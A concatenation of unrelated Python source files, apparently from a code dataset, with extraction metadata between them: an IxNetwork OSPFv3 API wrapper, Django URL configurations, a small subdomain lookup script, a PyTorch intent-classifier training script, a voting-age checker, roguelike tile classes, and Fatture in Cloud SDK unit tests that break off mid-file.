for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearAllLearnedInfo', payload=payload, response_object=None)
def ClearAllLearnedInfoInClient(self, *args, **kwargs):
"""Executes the clearAllLearnedInfoInClient operation on the server.
Clears ALL routes from GUI grid for the selected OSPFv3 router.
clearAllLearnedInfoInClient(Arg2=list)list
------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearAllLearnedInfoInClient', payload=payload, response_object=None)
def GetBasicLearnedInfo(self, *args, **kwargs):
"""Executes the getBasicLearnedInfo operation on the server.
Get Basic Learned Info
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
getBasicLearnedInfo(SessionIndices=list)
----------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
getBasicLearnedInfo(SessionIndices=string)
------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
getBasicLearnedInfo(Arg2=list)list
----------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getBasicLearnedInfo', payload=payload, response_object=None)
def GetDetailedLearnedInfo(self, *args, **kwargs):
"""Executes the getDetailedLearnedInfo operation on the server.
Get Detailed Learned Info
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
getDetailedLearnedInfo(SessionIndices=list)
-------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
getDetailedLearnedInfo(SessionIndices=string)
---------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
getDetailedLearnedInfo(Arg2=list)list
-------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getDetailedLearnedInfo', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
restartDown(SessionIndices=list)
--------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
restartDown(SessionIndices=string)
----------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartDown', payload=payload, response_object=None)
def ResumeHello(self, *args, **kwargs):
"""Executes the resumeHello operation on the server.
Resume sending OSPFv3 Hellos
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
resumeHello(SessionIndices=list)
--------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
resumeHello(SessionIndices=string)
----------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('resumeHello', payload=payload, response_object=None)
def Resumehello(self, *args, **kwargs):
"""Executes the resumehello operation on the server.
Starts the protocol state machine for the given protocol session instances.
resumehello(Arg2=list)list
--------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('resumehello', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
"""Executes the start operation on the server.
Start CPF control plane (equals to promote to negotiated state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(SessionIndices=list)
--------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
start(SessionIndices=string)
----------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
"""Executes the stop operation on the server.
Stop CPF control plane (equals to demote to PreValidated-DoDDone state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(SessionIndices=list)
-------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
stop(SessionIndices=string)
---------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def StopHello(self, *args, **kwargs):
"""Executes the stopHello operation on the server.
Stop sending OSPFv3 Hellos
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stopHello(SessionIndices=list)
------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
stopHello(SessionIndices=string)
--------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stopHello', payload=payload, response_object=None)
def Stophello(self, *args, **kwargs):
"""Executes the stophello operation on the server.
Stops the protocol state machine for the given protocol session instances.
stophello(Arg2=list)list
------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stophello', payload=payload, response_object=None)
| [
"uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100.LearnedInfo",
"uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector"
] | [((3810, 3825), 'uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector', 'Connector', (['self'], {}), '(self)\n', (3819, 3825), False, 'from uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector\n'), ((4368, 4385), 'uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100.LearnedInfo', 'LearnedInfo', (['self'], {}), '(self)\n', (4379, 4385), False, 'from uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100 import LearnedInfo\n')] |
from django.contrib import admin
from django.urls import path, include

# Built-in auth views (login, logout, password management).
_auth_routes = [
    path('accounts/', include('django.contrib.auth.urls')),
]

# Site core: landing pages and the admin backend.
_core_routes = [
    path('', include('home.urls')),
    path('admin/', admin.site.urls),
]

# Role-specific registration flows plus the help-request feature.
_feature_routes = [
    path('registration/medic', include('medic.urls')),
    path('registration/patient', include('patient.urls')),
    path('help-request/', include('helprequest.urls')),
]

# Concatenation preserves the original resolution order.
urlpatterns = _auth_routes + _core_routes + _feature_routes
| [
"django.urls.path",
"django.urls.include"
] | [((188, 219), 'django.urls.path', 'path', (['"""admin/"""', 'admin.site.urls'], {}), "('admin/', admin.site.urls)\n", (192, 219), False, 'from django.urls import path, include\n'), ((110, 145), 'django.urls.include', 'include', (['"""django.contrib.auth.urls"""'], {}), "('django.contrib.auth.urls')\n", (117, 145), False, 'from django.urls import path, include\n'), ((161, 181), 'django.urls.include', 'include', (['"""home.urls"""'], {}), "('home.urls')\n", (168, 181), False, 'from django.urls import path, include\n'), ((252, 273), 'django.urls.include', 'include', (['"""medic.urls"""'], {}), "('medic.urls')\n", (259, 273), False, 'from django.urls import path, include\n'), ((309, 332), 'django.urls.include', 'include', (['"""patient.urls"""'], {}), "('patient.urls')\n", (316, 332), False, 'from django.urls import path, include\n'), ((361, 388), 'django.urls.include', 'include', (['"""helprequest.urls"""'], {}), "('helprequest.urls')\n", (368, 388), False, 'from django.urls import path, include\n')] |
import requests
import re


def getSubDomain(url):
    """Fetch and print subdomains of `url` from the sonar.omnisint.io API.

    The scheme and a leading "www." are stripped first, then the domain is
    validated against a loose label-dot-TLD pattern before the lookup.
    """
    url = url.replace("www.", "").replace("https://", "").replace("http://", "")
    # Loose domain check: 1-256 word chars, a dot, then a 1-6 char TLD.
    pattern = r"[\w]{1,256}\.[a-zA-Z0-9()]{1,6}"
    if re.match(pattern, url):
        response = requests.get(f"https://sonar.omnisint.io/subdomains/{url}").text
        for sub in set(response.split("\n")):
            # Bug fix: the original `pass` was a no-op, so empty/too-short
            # entries were printed anyway; skip them instead.
            if sub == "" or len(sub) <= 3:
                continue
            print("[+] ", sub.replace("\"", "").replace("'", "").replace(",", "").replace(" ", ""))


if __name__ == "__main__":
    url = input("Enter Url [ex: example.com]: ")
    getSubDomain(url)
"requests.get",
"re.compile"
] | [((227, 246), 're.compile', 're.compile', (['pattern'], {}), '(pattern)\n', (237, 246), False, 'import re\n'), ((288, 347), 'requests.get', 'requests.get', (['f"""https://sonar.omnisint.io/subdomains/{url}"""'], {}), "(f'https://sonar.omnisint.io/subdomains/{url}')\n", (300, 347), False, 'import requests\n')] |
from django.urls import path
from .views import start_bot, end_bot

# (route, view) pairs for the bot control endpoints.
_ROUTES = (
    ('startbot/', start_bot),
    ('endbot/', end_bot),
)

urlpatterns = [path(route, view) for route, view in _ROUTES]
"django.urls.path"
] | [((86, 114), 'django.urls.path', 'path', (['"""startbot/"""', 'start_bot'], {}), "('startbot/', start_bot)\n", (90, 114), False, 'from django.urls import path\n'), ((118, 142), 'django.urls.path', 'path', (['"""endbot/"""', 'end_bot'], {}), "('endbot/', end_bot)\n", (122, 142), False, 'from django.urls import path\n')] |
import json
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from model import NeuralNetwork
from nltk_utils import stem, tokenize, bag_of_words
with open('./data/data.json', 'r') as f:
    data = json.load(f)

# Build the vocabulary, the tag list and the (token-list, tag) training pairs.
all_words = []
tags = []
xy = []
for intent in data['intents']:
    tag = intent['tag']
    tags.append(tag)
    for pattern in intent['patterns']:
        tokens = tokenize(pattern)
        all_words.extend(tokens)
        xy.append((tokens, tag))

# Stem the vocabulary, drop punctuation, and de-duplicate; sorting gives a
# stable feature order for the bag-of-words vectors.
ignore_words = ['?', '!', '.', ',']
all_words = sorted({stem(token) for token in all_words if token not in ignore_words})
tags = sorted(set(tags))
print(tags)

# Turn each tokenized sentence into a bag-of-words vector plus its tag index.
x_train = []
y_train = []
for sentence_tokens, sentence_tag in xy:
    x_train.append(bag_of_words(sentence_tokens, all_words))
    y_train.append(tags.index(sentence_tag))
x_train = np.array(x_train)
y_train = np.array(y_train)
class ChatDataset(Dataset):
    """Torch dataset wrapping the bag-of-words training arrays.

    Captures the module-level ``x_train`` / ``y_train`` arrays built above;
    each item is a (bag_of_words_vector, tag_index) pair.
    """

    def __init__(self) -> None:
        self.n_samples = len(x_train)
        self.x_data = x_train
        self.y_data = y_train

    # dataset[index] -> (features, label)
    def __getitem__(self, index: int) -> tuple:
        # Fixed annotation: the original declared `-> None` although a
        # (features, label) tuple is returned.
        return self.x_data[index], self.y_data[index]

    def __len__(self) -> int:
        return self.n_samples
# Hyperparams
batch_size = 8
hidden_size = 8
# One output logit per intent tag; input width equals the vocabulary size.
output_size = len(tags)
input_size = len(x_train[0])
learning_rate = 0.001
num_epochs = 1000
dataset = ChatDataset()
train_loader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True, num_workers=2)
# Train on GPU when available, otherwise fall back to CPU.
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = NeuralNetwork(input_size, hidden_size, output_size).to(device)
# Cross-entropy over the tag logits, optimized with Adam.
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
for epoch in range(num_epochs):
    for (words, labels) in train_loader:
        words = words.to(device)
        labels = labels.to(device)
        # Standard step: forward pass, loss, zero grads, backprop, update.
        outputs = model(words)
        loss = criterion(outputs, labels)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    # Progress report every 100 epochs (loss is from the last batch).
    if (epoch+1) % 100 == 0:
        print(f'epoch [{epoch+1}/{num_epochs}], loss: {loss.item():.4f}')
print(f'final loss: {loss.item():.4f}')
# Bundle the weights with the preprocessing metadata (vocabulary, tags and
# layer sizes) needed to rebuild the model at inference time.
data = {
    "model_state": model.state_dict(),
    "input_size": input_size,
    "output_size": output_size,
    "hidden_size": hidden_size,
    "all_words": all_words,
    "tags": tags
}
FILE = './data/data.pth'
torch.save(data, FILE)
print(f'training complete. file saved to {FILE}')
print(x_train)
"torch.nn.CrossEntropyLoss",
"numpy.array",
"nltk_utils.bag_of_words",
"nltk_utils.tokenize",
"torch.cuda.is_available",
"torch.save",
"torch.utils.data.DataLoader",
"json.load",
"model.NeuralNetwork",
"nltk_utils.stem"
] | [((896, 913), 'numpy.array', 'np.array', (['x_train'], {}), '(x_train)\n', (904, 913), True, 'import numpy as np\n'), ((924, 941), 'numpy.array', 'np.array', (['y_train'], {}), '(y_train)\n', (932, 941), True, 'import numpy as np\n'), ((1468, 1547), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'dataset', 'batch_size': 'batch_size', 'shuffle': '(True)', 'num_workers': '(2)'}), '(dataset=dataset, batch_size=batch_size, shuffle=True, num_workers=2)\n', (1478, 1547), False, 'from torch.utils.data import Dataset, DataLoader\n'), ((1703, 1724), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (1722, 1724), True, 'import torch.nn as nn\n'), ((2456, 2478), 'torch.save', 'torch.save', (['data', 'FILE'], {}), '(data, FILE)\n', (2466, 2478), False, 'import torch\n'), ((255, 267), 'json.load', 'json.load', (['f'], {}), '(f)\n', (264, 267), False, 'import json\n'), ((564, 571), 'nltk_utils.stem', 'stem', (['w'], {}), '(w)\n', (568, 571), False, 'from nltk_utils import stem, tokenize, bag_of_words\n'), ((763, 804), 'nltk_utils.bag_of_words', 'bag_of_words', (['pattern_sentence', 'all_words'], {}), '(pattern_sentence, all_words)\n', (775, 804), False, 'from nltk_utils import stem, tokenize, bag_of_words\n'), ((440, 457), 'nltk_utils.tokenize', 'tokenize', (['pattern'], {}), '(pattern)\n', (448, 457), False, 'from nltk_utils import stem, tokenize, bag_of_words\n'), ((1581, 1606), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1604, 1606), False, 'import torch\n'), ((1627, 1678), 'model.NeuralNetwork', 'NeuralNetwork', (['input_size', 'hidden_size', 'output_size'], {}), '(input_size, hidden_size, output_size)\n', (1640, 1678), False, 'from model import NeuralNetwork\n')] |
def voto(num, ano_atual=None):
    """Classify voting obligation (Brazilian-style rules) from a birth year.

    Args:
        num: Year of birth.
        ano_atual: Reference year for computing the age. Defaults to the
            current year, keeping the original ``voto(num)`` call working;
            passing it explicitly makes the function deterministic/testable.

    Returns:
        A status string containing the computed age: no vote under 16,
        optional for 16-17 or over 65, mandatory otherwise.
    """
    from datetime import date
    if ano_atual is None:
        ano_atual = date.today().year
    idade = ano_atual - num
    if idade < 16:
        return f"Com {idade} anos: NÃO VOTA"
    elif 16 <= idade < 18 or idade > 65:
        return f'Com {idade} anos: VOTO OPCIONAL'
    else:
        return f"Com {idade} anos: VOTO OBRIGATORIO"
print('-' * 30)
# Read the birth year interactively and report the voting status.
anonasc = int(input('Em que ano você nasceu? '))
print(voto(anonasc))
| [
"datetime.date.today"
] | [((60, 72), 'datetime.date.today', 'date.today', ([], {}), '()\n', (70, 72), False, 'from datetime import date\n')] |
import random
import libtcodpy as libtcod
# Grayscale palette ordered light -> dark; Wall.create_from_palette picks a
# random entry to vary wall tinting tile by tile.
GRAY_PALETTE = [
    # libtcod.Color(242, 242, 242),
    libtcod.Color(204, 204, 204),
    libtcod.Color(165, 165, 165),
    libtcod.Color(127, 127, 127),
    libtcod.Color(89, 89, 89),
]
class Tile:
    """
    A tile on a map. It may or may not be blocked, and may or may not block
    sight.

    Plain ``Tile`` instances carry no colors and are never drawn; subclasses
    (Floor, Wall, Door) supply ``bg_color``/``fg_color`` and are rendered.
    """

    def __init__(self, blocked, block_sight=None):
        self._blocked = blocked
        # By default, if a tile is blocked, it also blocks sight
        if block_sight is None:
            block_sight = blocked
        self._block_sight = block_sight
        self._fg_symbol = ' '
        self.explored = False

    @property
    def fg_symbol(self):
        return self._fg_symbol

    @property
    def blocked(self):
        return self._blocked

    @property
    def block_sight(self):
        return self._block_sight

    def render_at(self, con, x, y, visible):
        """
        Render a tile at position x, y
        """
        # Bare Tile instances have no colors to draw; bail out early.
        # Identity check (`is`, not `==`): subclasses must NOT take this exit.
        if type(self) is Tile:
            return
        # Set color for background
        libtcod.console_set_char_background(
            con, x, y, self.bg_color, libtcod.BKGND_SET)
        if self.fg_symbol is not None:
            # Draw symbol on foreground
            libtcod.console_put_char(
                con, x, y, self.fg_symbol, libtcod.BKGND_NONE)
            # Set color for foreground symbol
            libtcod.console_set_char_foreground(con, x, y, self.fg_color)
class Floor(Tile):
    """
    A block representing traversable terrain
    """

    def __init__(self, bg_color=libtcod.Color(20, 20, 20), fg_symbol=250,
                 alternate_fg_symbols=['[', ']', '{', '}', '*', '%'],
                 alternate_symbol_chance=0.1,
                 fg_color=libtcod.Color(65, 65, 65)):
        # Floors never block movement (nor sight, by Tile's default).
        super().__init__(False)
        self.bg_color = bg_color
        self.fg_color = fg_color
        # Occasionally show a debris glyph instead of the default floor dot.
        use_alternate = random.random() < alternate_symbol_chance
        self._fg_symbol = (random.choice(alternate_fg_symbols)
                           if use_alternate else fg_symbol)
class Door(Tile):
    """
    A door: always passable, but blocks sight while closed.
    """

    def __init__(self, bg_color=libtcod.Color(139,69,19),
                 fg_color=libtcod.orange, is_open=False):
        # Doors never block movement; sight depends on is_open (see below).
        super().__init__(False)
        self.bg_color = bg_color
        self.fg_color = fg_color
        self.is_open = is_open

    def open(self):
        self.is_open = True

    def close(self):
        self.is_open = False

    @property
    def fg_symbol(self):
        # '-' when open, '+' when closed.
        return '-' if self.is_open else '+'

    @property
    def block_sight(self):
        # A closed door is opaque.
        return not self.is_open
class Wall(Tile):
    """
    A block of wall
    """

    def __init__(self, bg_color, fg_symbol='#', fg_color=libtcod.black):
        # Declare it as blocked
        super().__init__(True)
        self.bg_color = bg_color
        self.fg_color = fg_color
        self._fg_symbol = fg_symbol

    @staticmethod
    def create_from_palette(palette=GRAY_PALETTE):
        """
        Build a Wall with a background color drawn at random from `palette`.

        palette: list
            Each element is a libtcod.Color object

        Fix: the original defined this without `self` and without
        `@staticmethod`, so calling it on an instance raised TypeError;
        class-level calls (`Wall.create_from_palette()`) are unchanged.
        """
        return Wall(random.choice(palette))
# def create(base_color=libtcod.Color(159, 89, 66), color_variance=20):
# # Extract colors
# b, g, r = base_color.b, base_color.g, base_color.r
# # Slightly alter them
# b += random.randint(-color_variance, color_variance)
# b = max(0, b)
# b = min(255, b)
# g += random.randint(-color_variance, color_variance)
# g = max(0, g)
# g = min(255, g)
# r += random.randint(-color_variance, color_variance)
# r = max(0, r)
# r = min(255, r)
# return Wall(libtcod.Color(b, g, r))
| [
"libtcodpy.console_set_char_background",
"libtcodpy.console_put_char",
"random.choice",
"libtcodpy.console_set_char_foreground",
"random.random",
"libtcodpy.Color"
] | [((101, 129), 'libtcodpy.Color', 'libtcod.Color', (['(204)', '(204)', '(204)'], {}), '(204, 204, 204)\n', (114, 129), True, 'import libtcodpy as libtcod\n'), ((135, 163), 'libtcodpy.Color', 'libtcod.Color', (['(165)', '(165)', '(165)'], {}), '(165, 165, 165)\n', (148, 163), True, 'import libtcodpy as libtcod\n'), ((169, 197), 'libtcodpy.Color', 'libtcod.Color', (['(127)', '(127)', '(127)'], {}), '(127, 127, 127)\n', (182, 197), True, 'import libtcodpy as libtcod\n'), ((203, 228), 'libtcodpy.Color', 'libtcod.Color', (['(89)', '(89)', '(89)'], {}), '(89, 89, 89)\n', (216, 228), True, 'import libtcodpy as libtcod\n'), ((1085, 1170), 'libtcodpy.console_set_char_background', 'libtcod.console_set_char_background', (['con', 'x', 'y', 'self.bg_color', 'libtcod.BKGND_SET'], {}), '(con, x, y, self.bg_color, libtcod.BKGND_SET\n )\n', (1120, 1170), True, 'import libtcodpy as libtcod\n'), ((1597, 1622), 'libtcodpy.Color', 'libtcod.Color', (['(20)', '(20)', '(20)'], {}), '(20, 20, 20)\n', (1610, 1622), True, 'import libtcodpy as libtcod\n'), ((1837, 1862), 'libtcodpy.Color', 'libtcod.Color', (['(65)', '(65)', '(65)'], {}), '(65, 65, 65)\n', (1850, 1862), True, 'import libtcodpy as libtcod\n'), ((2589, 2615), 'libtcodpy.Color', 'libtcod.Color', (['(139)', '(69)', '(19)'], {}), '(139, 69, 19)\n', (2602, 2615), True, 'import libtcodpy as libtcod\n'), ((1272, 1343), 'libtcodpy.console_put_char', 'libtcod.console_put_char', (['con', 'x', 'y', 'self.fg_symbol', 'libtcod.BKGND_NONE'], {}), '(con, x, y, self.fg_symbol, libtcod.BKGND_NONE)\n', (1296, 1343), True, 'import libtcodpy as libtcod\n'), ((1420, 1481), 'libtcodpy.console_set_char_foreground', 'libtcod.console_set_char_foreground', (['con', 'x', 'y', 'self.fg_color'], {}), '(con, x, y, self.fg_color)\n', (1455, 1481), True, 'import libtcodpy as libtcod\n'), ((2278, 2293), 'random.random', 'random.random', ([], {}), '()\n', (2291, 2293), False, 'import random\n'), ((2386, 2421), 'random.choice', 'random.choice', 
(['alternate_fg_symbols'], {}), '(alternate_fg_symbols)\n', (2399, 2421), False, 'import random\n'), ((3678, 3700), 'random.choice', 'random.choice', (['palette'], {}), '(palette)\n', (3691, 3700), False, 'import random\n')] |
"""
Fatture in Cloud API v2 - API Reference
Connect your software with Fatture in Cloud, the invoicing platform chosen by more than 400.000 businesses in Italy. The Fatture in Cloud API is based on REST, and makes possible to interact with the user related data prior authorization via OAuth2 protocol. # noqa: E501
The version of the OpenAPI document: 2.0.9
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
import unittest
import fattureincloud_python_sdk
from fattureincloud_python_sdk.rest import RESTResponse
import functions
from fattureincloud_python_sdk.api.info_api import InfoApi
from fattureincloud_python_sdk.model.city import City
from fattureincloud_python_sdk.model.currency import Currency
from fattureincloud_python_sdk.model.document_template import DocumentTemplate
from fattureincloud_python_sdk.model.language import Language
from fattureincloud_python_sdk.model.list_archive_categories_response import ListArchiveCategoriesResponse
from fattureincloud_python_sdk.model.list_cities_response import ListCitiesResponse
from fattureincloud_python_sdk.model.detailed_country import DetailedCountry
from fattureincloud_python_sdk.model.list_detailed_countries_response import ListDetailedCountriesResponse
from fattureincloud_python_sdk.model.list_cost_centers_response import ListCostCentersResponse
from fattureincloud_python_sdk.model.list_countries_response import ListCountriesResponse
from fattureincloud_python_sdk.model.list_currencies_response import ListCurrenciesResponse
from fattureincloud_python_sdk.model.list_delivery_notes_default_causals_response import ListDeliveryNotesDefaultCausalsResponse
from fattureincloud_python_sdk.model.list_languages_response import ListLanguagesResponse
from fattureincloud_python_sdk.model.list_payment_accounts_response import ListPaymentAccountsResponse
from fattureincloud_python_sdk.model.list_payment_methods_response import ListPaymentMethodsResponse
from fattureincloud_python_sdk.model.list_product_categories_response import ListProductCategoriesResponse
from fattureincloud_python_sdk.model.list_received_document_categories_response import ListReceivedDocumentCategoriesResponse
from fattureincloud_python_sdk.model.list_revenue_centers_response import ListRevenueCentersResponse
from fattureincloud_python_sdk.model.list_templates_response import ListTemplatesResponse
from fattureincloud_python_sdk.model.list_units_of_measure_response import ListUnitsOfMeasureResponse
from fattureincloud_python_sdk.model.list_vat_types_response import ListVatTypesResponse
from fattureincloud_python_sdk.model.payment_account import PaymentAccount
from fattureincloud_python_sdk.model.payment_account_type import PaymentAccountType
from fattureincloud_python_sdk.model.payment_method import PaymentMethod
from fattureincloud_python_sdk.model.payment_method_details import PaymentMethodDetails
from fattureincloud_python_sdk.model.payment_method_type import PaymentMethodType
from fattureincloud_python_sdk.model.vat_type import VatType
class TestInfoApi(unittest.TestCase):
    """InfoApi unit test stubs.

    Every test follows the same pattern: stub the REST client's GET with a
    canned 200 response (see _mock_get), invoke the InfoApi method under
    test, patch one field of the deserialized result, and compare it with a
    hand-built expected response object (exercising both deserialization
    and model equality).
    """

    def setUp(self):
        self.api = InfoApi()

    def tearDown(self):
        pass

    def _mock_get(self, body):
        """Route api_client GET calls to a canned 200 RESTResponse carrying `body`.

        Extracted helper: the original repeated this 8-line mock setup in
        every test method.
        """
        resp = {
            'status': 200,
            'data': body,
            'reason': "OK"
        }
        mock_resp = RESTResponse(functions.Dict2Class(resp))
        mock_resp.getheader = unittest.mock.MagicMock(return_value=None)
        mock_resp.getheaders = unittest.mock.MagicMock(return_value=None)
        self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value=mock_resp)

    def test_list_archive_categories(self):
        self._mock_get(b'{"data":["cat5", "cat6"]}')
        expected = ListArchiveCategoriesResponse(data=["cat7", "cat6"])
        actual = self.api.list_archive_categories(2)
        actual.data[0] = "cat7"
        assert actual == expected

    def test_list_cities(self):
        self._mock_get(b'{"data": [{"city": "bergamo", "province": "BG", "postal_code": "24121"}]}')
        expected = ListCitiesResponse(data=[City(postal_code="24121", city="BG", province="BG")])
        actual = self.api.list_cities()
        actual.data[0].city = "BG"
        assert actual == expected

    def test_list_cost_centers(self):
        self._mock_get(b'{"data":["bg", "mi"]}')
        expected = ListCostCentersResponse(data=["to", "mi"])
        actual = self.api.list_cost_centers(2)
        actual.data[0] = "to"
        assert actual == expected

    def test_list_countries(self):
        self._mock_get(b'{"data":["Spagna", "Italia"]}')
        expected = ListCountriesResponse(data=["Spagna", "Albania"])
        actual = self.api.list_countries()
        actual.data[1] = "Albania"
        assert actual == expected

    def test_list_detailed_countries(self):
        self._mock_get(b'{"data": [{"name": "Italia", "settings_name": "Italia", "iso": "IT", "fiscal_iso": "IT", "uic": "086"}, {"name": "Albania", "settings_name": "Albania", "iso": "AL", "fiscal_iso": "AL", "uic": "087"}]}')
        expected = ListDetailedCountriesResponse(
            data=[
                DetailedCountry(
                    name="Italia",
                    settings_name="Italia",
                    iso="IT",
                    fiscal_iso="IT",
                    uic="086"
                ),
                DetailedCountry(
                    name="Albania",
                    settings_name="Albania",
                    iso="AL",
                    fiscal_iso="AL",
                    uic="087"
                )
            ]
        )
        actual = self.api.list_detailed_countries()
        actual.data[1].name = "Albania"
        assert actual == expected

    def test_list_currencies(self):
        self._mock_get(b'{"data": [{"id": "EUR", "symbol": "e", "exchange_rate": "1"}]}')
        expected = ListCurrenciesResponse(data=[Currency(id="USD", symbol="e", exchange_rate="1")])
        actual = self.api.list_currencies()
        actual.data[0].id = "USD"
        assert actual == expected

    def test_list_delivery_notes_default_causals(self):
        self._mock_get(b'{"data":["causal1", "causal2"]}')
        expected = ListDeliveryNotesDefaultCausalsResponse(data=["causal3", "causal2"])
        actual = self.api.list_delivery_notes_default_causals()
        actual.data[0] = "causal3"
        assert actual == expected

    def test_list_languages(self):
        self._mock_get(b'{"data":[{"code":"ITA","name":"Italiano"}]}')
        expected = ListLanguagesResponse(data=[Language(code="ITA", name="Italiano")])
        actual = self.api.list_languages()
        assert actual == expected

    def test_list_payment_accounts(self):
        self._mock_get(b'{"data": [{"id": 1, "name": "<NAME>", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}]}')
        expected = ListPaymentAccountsResponse(data=[PaymentAccount(
            id=2,
            name="<NAME>",
            type=PaymentAccountType("standard"),
            iban="iban_example",
            sia="sia_example",
            cuc="cuc_example",
            virtual=True
        )])
        actual = self.api.list_payment_accounts(2)
        actual.data[0].id = 2
        assert actual == expected

    def test_list_payment_methods(self):
